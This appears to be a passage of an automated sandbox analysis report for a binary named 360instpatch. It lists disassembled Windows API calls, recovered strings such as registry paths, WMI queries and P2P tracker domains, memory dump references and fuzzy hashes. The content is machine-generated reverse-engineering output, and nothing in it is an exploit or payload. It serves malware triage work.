                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32 ref: 00B92ACE
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B92AE7
                                                                                                                                                                                                                • Part of subcall function 00B928D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00B9291E
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 00B92B18
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00B92B63
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00B92B89
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00B92BA0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00B92A30
                                                                                                                                                                                                              • ServiceName, xrefs: 00B92ABC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                                                              • API String ID: 2630661138-1795789498
                                                                                                                                                                                                              • Opcode ID: 5a46f6c64a90942eec82c50cae945434925e35356a7b9226fce10a1feee371ad
                                                                                                                                                                                                              • Instruction ID: fcb99b5dd91a941f7e6df81e16f081f8e0cc1b3ca888720d98699d3ac8aa9c96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a46f6c64a90942eec82c50cae945434925e35356a7b9226fce10a1feee371ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33517E71604341AFEB24CF64CC85FABB7E8EB88704F04496DB59997190EB70E909C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B842FD
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,0000000C), ref: 00B84327
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8438A
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 00B843BA
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00B843D6
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 00B843E1
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 00B84418
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00B84461
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00B8446C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 00B84489
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
                                                                                                                                                                                                              • String ID: \Device\Harddisk$\\.\
                                                                                                                                                                                                              • API String ID: 3469461504-3168084310
                                                                                                                                                                                                              • Opcode ID: 14d23a7ea76df9b218ed0b1dc2ae21a37644d781eec4a12b845595f0eb3fb517
                                                                                                                                                                                                              • Instruction ID: 37dbc2607bf7fa6441615fe2093ab567b0c5f3b27a7eb9224c9e41fde1f00e58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14d23a7ea76df9b218ed0b1dc2ae21a37644d781eec4a12b845595f0eb3fb517
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C41BDB1500119ABCB10EFA4DC81FFEB7E8EF08710F540579FA25A7290DB309A09CB65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(A6233702,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F26
                                                                                                                                                                                                                • Part of subcall function 6CD26C60: _vswprintf_s.LIBCMT ref: 6CD26C8A
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F5B
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F6E
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F7E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26F9C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,6CE04B2B,000000FF), ref: 6CD26FAD
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CD26FE7
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CD27011
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 6CD27029
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6CD27034
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8HeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vswprintf_s
                                                                                                                                                                                                              • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                                                              • API String ID: 3526415198-332789905
                                                                                                                                                                                                              • Opcode ID: 43c437284523dce8248f7ce3c17b0be449cc7a6453642472cd41c92760a1a515
                                                                                                                                                                                                              • Instruction ID: b433c16dd4a4ce12222ba4aa6255b2ebf57bd6cc008c004ccc60db7230a1b4ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43c437284523dce8248f7ce3c17b0be449cc7a6453642472cd41c92760a1a515
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7341E672A05248EFCF209FA4CD84B9E77B4FB05318F51462DF915E3680EB3959498BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF11DBC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF11DC6
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF11DF3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11DFB
                                                                                                                                                                                                                • Part of subcall function 6BF0DF99: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BF0DFA1
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E1A
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E2A
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E57
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF11E63
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 6BF11E9E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 6BF11E41
                                                                                                                                                                                                              • [TaskScheduler] OnTimer cost:%dms, queue:%d., xrefs: 6BF11E74
                                                                                                                                                                                                              • p2sp.TaskScheduler, xrefs: 6BF11DC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$_memset$CurrentDispatcherEventExceptionH_prolog3ObjectSingleThreadUserWaitwvnsprintf
                                                                                                                                                                                                              • String ID: [TaskScheduler] OnTimer cost:%dms, queue:%d.$[TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.TaskScheduler
                                                                                                                                                                                                              • API String ID: 1333431131-1132454424
                                                                                                                                                                                                              • Opcode ID: 4bcbd4ddd8c0212a3fd1ebec64d06b13f6d4fd4d66da9abb75e0e807f5f0e487
                                                                                                                                                                                                              • Instruction ID: 47810cdb5457885cff9dc2f0215bf101e72173193bb4b1c193d116937e5573b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bcbd4ddd8c0212a3fd1ebec64d06b13f6d4fd4d66da9abb75e0e807f5f0e487
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84214D73D1022AAFCF40DFF4C941B9EBBF5BF18214F104556E511E6160E779AA148BA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF368F3
                                                                                                                                                                                                                • Part of subcall function 6BF33A17: GetTickCount.KERNEL32 ref: 6BF33A23
                                                                                                                                                                                                                • Part of subcall function 6BF361A2: GetTickCount.KERNEL32 ref: 6BF36230
                                                                                                                                                                                                                • Part of subcall function 6BF361A2: GetTickCount.KERNEL32 ref: 6BF362BB
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF36914
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF369D2
                                                                                                                                                                                                              • htonl.WS2_32(?), ref: 6BF36A32
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF36A53
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF36ABD
                                                                                                                                                                                                              • htonl.WS2_32(00000000), ref: 6BF36C21
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • agt.p.360.cn, xrefs: 6BF36978
                                                                                                                                                                                                              • [change tracker ip]: udp: %s ,tcpproxy:%s %d, xrefs: 6BF36A8F
                                                                                                                                                                                                              • [Use Tcp tracker Proxy] %s:%d, xrefs: 6BF36C51
                                                                                                                                                                                                              • tr.p.360.cn, xrefs: 6BF3694E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$htonl$H_prolog3
                                                                                                                                                                                                              • String ID: [Use Tcp tracker Proxy] %s:%d$[change tracker ip]: udp: %s ,tcpproxy:%s %d$agt.p.360.cn$tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 559081447-3200203581
                                                                                                                                                                                                              • Opcode ID: cf6402f7a2d2c75051245f9547a4c7041608dd37e550b64426304942a48054ec
                                                                                                                                                                                                              • Instruction ID: 53d94e183842691377ab0226cfaa5df66d290382ac38a9ee1c952a8fe933dcde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf6402f7a2d2c75051245f9547a4c7041608dd37e550b64426304942a48054ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AC1AE32504626AFDB14CF74C895BAAB3B2FF45304F14455DE46A5B2B0DB38B945CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B822E7
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00BDC868,00000000,00000001,00BDC798,?,0000002C,00B845AD,?,?,?,?,?,?,?,?,?), ref: 00B82305
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B82364
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B82389
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B82405
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00B8240A
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00B82460
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • MediaType, xrefs: 00B82472
                                                                                                                                                                                                              • SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 00B823A6
                                                                                                                                                                                                              • WQL, xrefs: 00B823D0
                                                                                                                                                                                                              • Root\Microsoft\Windows\Storage, xrefs: 00B8232D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
                                                                                                                                                                                                              • String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
                                                                                                                                                                                                              • API String ID: 2951287799-4271271752
                                                                                                                                                                                                              • Opcode ID: ec7227d4155acfc48441219a1e6fbfff7a6568637e474ae12d0eaa367ed792ae
                                                                                                                                                                                                              • Instruction ID: 7d40f1a42687e2fcf899e9d4ff6c17d458b9a2bef1ad87561b38dd616e4afd8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec7227d4155acfc48441219a1e6fbfff7a6568637e474ae12d0eaa367ed792ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3714B71900249EFDF01DFE4C895AADBBF8EF48304F2444A9F615AB2A1C7759E45CB21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E7FE
                                                                                                                                                                                                                • Part of subcall function 00B3ECB6: __EH_prolog3.LIBCMT ref: 00B3ECBD
                                                                                                                                                                                                                • Part of subcall function 00B7E697: __EH_prolog3.LIBCMT ref: 00B7E69E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E887
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E8D9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00B7E8EA
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E901
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E925
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E92E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
                                                                                                                                                                                                              • String ID: %s\%s.tf
                                                                                                                                                                                                              • API String ID: 3257772056-3749842194
                                                                                                                                                                                                              • Opcode ID: bdf32af999b7a9eece5edec689ed83ed2f5ae965c4ecd18db233aa7d0e4d6a25
                                                                                                                                                                                                              • Instruction ID: 388478cf0f0b8482554d94e72564169a094ffdbcb090902ded35bea76dab257a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdf32af999b7a9eece5edec689ed83ed2f5ae965c4ecd18db233aa7d0e4d6a25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8416371900148ABDF25EFA4DC46EFE7BF8EF48310F0441A9F529A7291DB70AA44CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,00000010,?), ref: 6BF27390
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                              • Opcode ID: 8c3abe1428435b7abac3e4db419699603a013c85a3faf7b20bb94d7bead02ef3
                                                                                                                                                                                                              • Instruction ID: 1b13b6bb1b4bc1f9d12e29abf0c08a8d8a04be3f3c282bcb86bc7583222fde04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3abe1428435b7abac3e4db419699603a013c85a3faf7b20bb94d7bead02ef3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B316A73210302EFEB205FA6CC88E57BBE9FF56711B108869F95A81170C7759CA8DB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A2E7
                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A301
                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A311
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A318
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A327
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00B7A349
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$Global$AllocFindFreeLoadLockSizeof
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3537612842-0
                                                                                                                                                                                                              • Opcode ID: 02e84ad4c7140579fa6696b4d66a3caf6b542acc63162b6e09ac137004b679ce
                                                                                                                                                                                                              • Instruction ID: 1e8d9b86dab45035faf7522d2dd32ce1c3d15dfd28b31a603a00394f11057fc5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02e84ad4c7140579fa6696b4d66a3caf6b542acc63162b6e09ac137004b679ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD217131100214EFDB122F609C8CCAF3BADFFC97503158864F829D7120EB35DD509A66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B806B0
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,00000010), ref: 00B806CC
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8070A
                                                                                                                                                                                                                • Part of subcall function 00B56DCF: _vswprintf_s.LIBCMT ref: 00B56E02
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D74A
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D767
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D77A
                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?), ref: 00B8083D
                                                                                                                                                                                                                • Part of subcall function 00B6EE1E: __EH_prolog3.LIBCMT ref: 00B6EE25
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B807B9
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B807FA
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?), ref: 00B80821
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove_vswprintf_s
                                                                                                                                                                                                              • String ID: %s\%s$%s\*.*
                                                                                                                                                                                                              • API String ID: 1543874411-1665845743
                                                                                                                                                                                                              • Opcode ID: 00762d88372a071d710df8b83237fceb886d058d2633606556d967ee8badf2b9
                                                                                                                                                                                                              • Instruction ID: fea5d431c2ad591f080c012e7d56f1649e71f07163c35107f7861e2d5e001155
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00762d88372a071d710df8b83237fceb886d058d2633606556d967ee8badf2b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83512E7191028EABDF60EFA4CC45BEF77ECEF18704F404469B91997252EB34A608CB65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BEF55D5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,6BF0B438,00000000,?,?,6BF0C3E5,?,00000007,?), ref: 6BEF5643
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] ErrorCode =%d,StartDownload, xrefs: 6BEF56A3
                                                                                                                                                                                                              • [%d.] ErrorCode =%d,, xrefs: 6BEF5650
                                                                                                                                                                                                              • [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d , xrefs: 6BEF56F2
                                                                                                                                                                                                              • [%d.] , xrefs: 6BEF55EB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorH_prolog3Last_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d $[%d.] $[%d.] ErrorCode =%d,$[%d.] ErrorCode =%d,StartDownload
                                                                                                                                                                                                              • API String ID: 2481933832-1659077646
                                                                                                                                                                                                              • Opcode ID: 103b33ac9558f176dd69dc220d53607528699bf63ea4a26b7bda7e0e4d7c4327
                                                                                                                                                                                                              • Instruction ID: 9e5d0e8ff7c06d23378db5283202a5631649e9764c3a44afb120abcbd8b27a97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 103b33ac9558f176dd69dc220d53607528699bf63ea4a26b7bda7e0e4d7c4327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3513E72904701EFDB51CFB8C881B867BE5FF18314F108629E96D8B2A1D736A561CFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] RenameFile file(%s) already exist, xrefs: 6BEE96EE
                                                                                                                                                                                                              • [%d.] MoveFile fail, error code is %d, xrefs: 6BEE971C
                                                                                                                                                                                                              • %s.%u, xrefs: 6BEE96CB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CountDeleteErrorLastMoveTick
                                                                                                                                                                                                              • String ID: %s.%u$[%d.] MoveFile fail, error code is %d$[%d.] RenameFile file(%s) already exist
                                                                                                                                                                                                              • API String ID: 804011810-1231871111
                                                                                                                                                                                                              • Opcode ID: c558f82eea39be37a152d85dd7252eb725c8fa7d1a88f039168af1eb40bde10b
